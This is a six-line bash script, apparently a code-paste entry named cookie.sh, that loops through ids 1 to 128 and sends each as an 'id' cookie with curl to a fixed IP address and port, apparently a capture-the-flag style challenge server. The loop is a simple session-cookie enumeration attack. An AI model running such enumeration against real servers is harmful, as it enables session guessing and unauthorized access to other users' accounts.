cookie.sh 116 B

1234567
  1. #!/bin/bash
  2. # send cookie id from 1 to 128
  3. for i in {1..128};
  4. do
  5. curl -b id=$i http://62.173.140.174:16003
  6. done